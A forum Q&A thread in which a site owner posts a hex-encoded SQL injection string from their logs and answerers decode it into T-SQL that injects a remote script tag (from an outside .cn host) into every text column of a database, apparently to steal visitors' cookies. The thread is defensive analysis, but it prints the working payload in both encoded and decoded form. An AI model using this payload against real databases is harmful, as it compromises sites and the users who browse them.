SQL injection attack - What is going on here? [duplicate]

Question

Possible Duplicate:
Attempted SQL injection attack - what are they trying to do?

I have seen this SQL injection attempt on my site many times in the last few months.

';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself. However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

Answer 1

Note: my first explanation was incorrect because I didn't actually read through the whole thing...

here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script>
      <!--''+['+@C+'] where '+@C+' not like ''%">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
'')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

Answer 2

Actually Jimmy, if you analyze this code, it uses a cursor to inject a javascript reference to hxxp://www2.s800qn.cn/csrss/w.js in every text field in the database.

This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.

That javascript link is now dead, but it probably contained code to grab the users cookies.